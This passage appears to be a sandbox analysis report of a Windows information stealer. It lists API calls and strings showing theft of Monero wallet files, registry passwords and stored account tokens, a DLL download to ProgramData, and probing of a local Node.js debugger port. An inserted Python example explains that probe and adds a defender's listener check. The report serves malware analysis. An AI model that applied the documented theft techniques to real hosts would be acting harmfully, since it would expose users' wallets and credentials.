                                      • Part of subcall function 0068A210: LocalFree.KERNEL32(?,?,?,?,00684F3E,00000000,?), ref: 0068A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 006946F3
                                    • StrCmpCA.SHLWAPI(?,006A08D2), ref: 00694710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00694722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00694735
                                    • lstrcat.KERNEL32(00000000,006A0FA0), ref: 00694744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: ece25692d762247b13c92f4e92506959b6ef39cfe174a2267aedc7b71676ac17
                                    • Instruction ID: 71ea57dcbda34aaf769035af0362ee1ff2645a4ddc60f24f73285c4878557408
                                    • Opcode Fuzzy Hash: ece25692d762247b13c92f4e92506959b6ef39cfe174a2267aedc7b71676ac17
                                    • Instruction Fuzzy Hash: D17164B6910208ABDF54EBE0ED85FEE737EAB89300F004598F60597581EA34EB45CB95
                                    APIs
                                      • Part of subcall function 006812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                                      • Part of subcall function 006812A0: RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                                      • Part of subcall function 006812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                                      • Part of subcall function 006812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                                      • Part of subcall function 006812A0: RegCloseKey.ADVAPI32(?), ref: 006812FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0068134F
                                    • lstrlen.KERNEL32(?), ref: 0068135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00681377
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00681465
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 006814EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 6b0d1ec78fcd34e63f0501ebf14d6ee1988c9d35645d7a633fc59562db2c5470
                                    • Instruction ID: b3c0a8cd558b75a5afac68000333f930aaf264860186e9b7a2c03fd7c26d3df8
                                    • Opcode Fuzzy Hash: 6b0d1ec78fcd34e63f0501ebf14d6ee1988c9d35645d7a633fc59562db2c5470
                                    • Instruction Fuzzy Hash: 225153B19101189BCF54FBA0DCA2EED737E9F54300F4045DCB20A62491EE306B89CFAA
                                    APIs
                                    • InternetOpenA.WININET(006A0AF6,00000001,00000000,00000000,00000000), ref: 00689A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00689AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00689AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: 1e33ba38474ae106a59ec0f3695a890632994d676f8ca0f147569e6a9fd3c5ed
                                    • Instruction ID: 308af9cb17b29e7cebc15d46117360e264594d429a0a205b91bc6f29c27ef3b2
                                    • Opcode Fuzzy Hash: 1e33ba38474ae106a59ec0f3695a890632994d676f8ca0f147569e6a9fd3c5ed
                                    • Instruction Fuzzy Hash: CB412B35A14258EFDB14EFA4DC95FEDB77AAB48740F104198F509AB190CBB0AE84CF64
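Added example (Python; not code from the report or from the sample): the discovery exchange behind the InternetOpenUrlA call above. GET http://localhost:9229/json is the Node.js inspector's discovery endpoint; it answers with a JSON array in which each debuggable target carries a webSocketDebuggerUrl, and the strings "webSocketDebuggerUrl": and "ws:// show the sample locating that URL by substring search. The response and the netstat lines below are constructed and the target id is made up. The report lists the strings cookies and /devtools for the related function but does not show the WebSocket exchange, so the example stops at discovery and adds the listener check a defender would run on a host.

```python
import json
import re

# Constructed in the shape Node's inspector returns for GET /json; the id is made up.
TARGET_ID = "1b4c6e2a-3f1d-4d3c-9a1e-5b0f2a7c8d9e"
DISCOVERY_RESPONSE = json.dumps([{
    "description": "node.js instance",
    "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?experiments=true&v8only=true"
                           f"&ws=localhost:9229/{TARGET_ID}",
    "id": TARGET_ID,
    "title": "app.js",
    "type": "node",
    "url": "file:///C:/app/app.js",
    "webSocketDebuggerUrl": f"ws://localhost:9229/{TARGET_ID}",
}])

def debugger_url_by_substring(body: str) -> str:
    """What the two strings in the listing imply: find "webSocketDebuggerUrl": then the next "ws://."""
    i = body.find('"webSocketDebuggerUrl":')
    if i < 0:
        raise ValueError("no debuggable target advertised")
    j = body.index('"ws://', i) + 1            # skip the opening quote
    return body[j:body.index('"', j)]

def debugger_targets(body: str):
    """Proper parse: every (type, ws URL) pair the inspector will hand to a local client."""
    return [(t.get("type"), t["webSocketDebuggerUrl"])
            for t in json.loads(body) if "webSocketDebuggerUrl" in t]

WS_RE = re.compile(r"^ws://(?P<host>[^/:]+):(?P<port>\d+)/(?P<id>[0-9a-f-]{36})$")

def is_local_inspector(ws_url: str) -> bool:
    """True when the URL points at the default Node inspector port on the loopback interface."""
    m = WS_RE.match(ws_url)
    return bool(m) and m.group("host") in ("localhost", "127.0.0.1") and m.group("port") == "9229"

# Defender side: constructed `netstat -ano` output; flag anything listening on the inspector port.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    127.0.0.1:9229         0.0.0.0:0              LISTENING       4321
  TCP    192.168.1.20:49712     203.0.113.10:443       ESTABLISHED     5540
""".splitlines()
NETSTAT_RE = re.compile(r"^\s*TCP\s+(?P<addr>[\d.]+):(?P<port>\d+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$")

def find_inspector_listeners(lines, ports=(9229,)):
    """Return (address, port, pid) for every TCP listener on one of the given ports."""
    found = []
    for line in lines:
        m = NETSTAT_RE.match(line)
        if m and int(m.group("port")) in ports:
            found.append((m.group("addr"), int(m.group("port")), int(m.group("pid"))))
    return found

if __name__ == "__main__":
    print(debugger_url_by_substring(DISCOVERY_RESPONSE))
    print(find_inspector_listeners(NETSTAT_SAMPLE))
```

The inspector endpoint carries no authentication: any process on the host that can reach it gets a DevTools session with the privileges of the debugged Node or Electron process, which is why the sample probes it. A listener on 127.0.0.1:9229 on a user workstation therefore deserves the same attention as the sample's other targets, and the PID it resolves to tells you which application opened it.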
                                    APIs
                                      • Part of subcall function 00687330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068739A
                                      • Part of subcall function 00687330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00687411
                                      • Part of subcall function 00687330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068746D
                                      • Part of subcall function 00687330: GetProcessHeap.KERNEL32(00000000,?), ref: 006874B2
                                      • Part of subcall function 00687330: HeapFree.KERNEL32(00000000), ref: 006874B9
                                    • lstrcat.KERNEL32(00000000,006A192C), ref: 00687666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 006876A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 006876BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 006876EF
                                    • lstrcat.KERNEL32(00000000,006A1934), ref: 00687700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00687733
                                    • lstrcat.KERNEL32(00000000,006A1938), ref: 0068774D
                                    • task.LIBCPMTD ref: 0068775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: 1b04623143a5db47ebf180c5f7554225e9016ee118c50f26e136621c41b2c1ea
                                    • Instruction ID: 2d21df75394409b4ca189b536258d0ac8bbb68d0b93c30524227d9b01ce0a459
                                    • Opcode Fuzzy Hash: 1b04623143a5db47ebf180c5f7554225e9016ee118c50f26e136621c41b2c1ea
                                    • Instruction Fuzzy Hash: 0E315071918205EFDB04EBF0ED95DFFB37AAB44302F504208F116672A0DE34AA46DB94
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0142DB00,00000000,?,006A0E14,00000000,?,00000000), ref: 006982C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006982C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006982E8
                                    • __aulldiv.LIBCMT ref: 00698302
                                    • __aulldiv.LIBCMT ref: 00698310
                                    • wsprintfA.USER32 ref: 0069833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                     • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: c701008e2b7ac95a2c46e7f57924c3d5f69872604768b288e12d1d2a70886635
                                    • Instruction ID: aced23c206e97a1bad7226b7e01345d0a9581ac17bb5efcefa86bcc27b0d413d
                                    • Opcode Fuzzy Hash: c701008e2b7ac95a2c46e7f57924c3d5f69872604768b288e12d1d2a70886635
                                    • Instruction Fuzzy Hash: E52124B1A48308ABDB00DFD5DD4AFAEB7BDEB45B14F104519F215AB680C77869018BA8
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                    • InternetOpenA.WININET(006A0DFB,00000001,00000000,00000000,00000000), ref: 0068615F
                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 006861DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00686203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0068622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0068625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00686299
                                    • InternetCloseHandle.WININET(?), ref: 006862A3
                                    • InternetCloseHandle.WININET(00000000), ref: 006862B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 84adf0132b900420cc07cde5ea743bb1e6239736925b163c15b1f0b86ac5e2ea
                                    • Instruction ID: f49bea2e18a90f22e31a03fb38177d417233366764a39b64ef1f62853713ead6
                                    • Opcode Fuzzy Hash: 84adf0132b900420cc07cde5ea743bb1e6239736925b163c15b1f0b86ac5e2ea
                                    • Instruction Fuzzy Hash: 6E5172B1A54208ABDF20EFA0DC55BEEB77AAB44301F104198F605A71C1DB74AB89CF95
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 0070024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0070035B
                                    • CatchIt.LIBVCRUNTIME ref: 007003AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 007004C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: 9cc8812c1b71d515e08853bfd2a49aee18a924c4fb58d51f37e4796a1468c904
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: 21B19B75800209EFCF25DFA4C885AAEBBF5BF05324F10426AF9156B292D338DA51CBD5
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00687411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 006874B2
                                    • HeapFree.KERNEL32(00000000), ref: 006874B9
                                    • task.LIBCPMTD ref: 006875B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: dd3c141897f5fe4b83021ff6f2983c7c36221cf99c83e531ed7f60a981b8e93f
                                    • Instruction ID: a17dafbc89d3d028dab1d4cb93a5ca5042b44a94bb2c54ea4c3eb63ba0c764f2
                                    • Opcode Fuzzy Hash: dd3c141897f5fe4b83021ff6f2983c7c36221cf99c83e531ed7f60a981b8e93f
                                    • Instruction Fuzzy Hash: 96612DB18141589BDB24EB50CC55BDAB7B9BF44300F1082E9E649A7241DF70AFC9CFA5
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • lstrlen.KERNEL32(00000000), ref: 0068BC6F
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 0068BD75
                                    • lstrlen.KERNEL32(00000000), ref: 0068BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 28542eb845346dee0c583d86a27fb267b0e5cf701593998b712a521ff03f0bc9
                                    • Instruction ID: dcac044bcd0a0ba6017b53582516a5148db6a5c62ea590b74e287ffd27de3ccb
                                    • Opcode Fuzzy Hash: 28542eb845346dee0c583d86a27fb267b0e5cf701593998b712a521ff03f0bc9
                                    • Instruction Fuzzy Hash: C1B13E729141089BCF44FBE0DCA6EEEB3BEAF14301F40455CF50666595EF346A48CBAA
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 8db16189341dfec68ff3fa3afa60d1b87a4d288fd88005835c826f87e55e421c
                                    • Instruction ID: bc46b9e4a8f56badebd391a7438040de524b08ddd278e6f89fc5ad28da948fdc
                                    • Opcode Fuzzy Hash: 8db16189341dfec68ff3fa3afa60d1b87a4d288fd88005835c826f87e55e421c
                                    • Instruction Fuzzy Hash: 89F0583092C309EFD744AFE2FC0979CFB34EB04707F114199F61A96290CA706B80AB61
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00699850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,006908DC,C:\ProgramData\chrome.dll), ref: 00699871
                                      • Part of subcall function 0068A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0068A098
                                    • StrCmpCA.SHLWAPI(00000000,01428F58), ref: 00690922
                                    • StrCmpCA.SHLWAPI(00000000,01428F68), ref: 00690B79
                                    • StrCmpCA.SHLWAPI(00000000,01428DF8), ref: 00690A0C
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00690C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 00690C30
                                    • C:\ProgramData\chrome.dll, xrefs: 006908CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 6eccbd3fa31c263b77895a7683928c131504faa5f2919a9cbd5ea709695b1daf
                                    • Instruction ID: 0e54145eaa2dc4bf99256f7c3cabd1a0ca092ce52d2f5dc139c6041dc0d9b3a1
                                    • Opcode Fuzzy Hash: 6eccbd3fa31c263b77895a7683928c131504faa5f2919a9cbd5ea709695b1daf
                                    • Instruction Fuzzy Hash: 9FA156717002089FCF58FFA4D996AED77BBAF95300F10816DE40A9F651DA309A09CBD6
                                    APIs
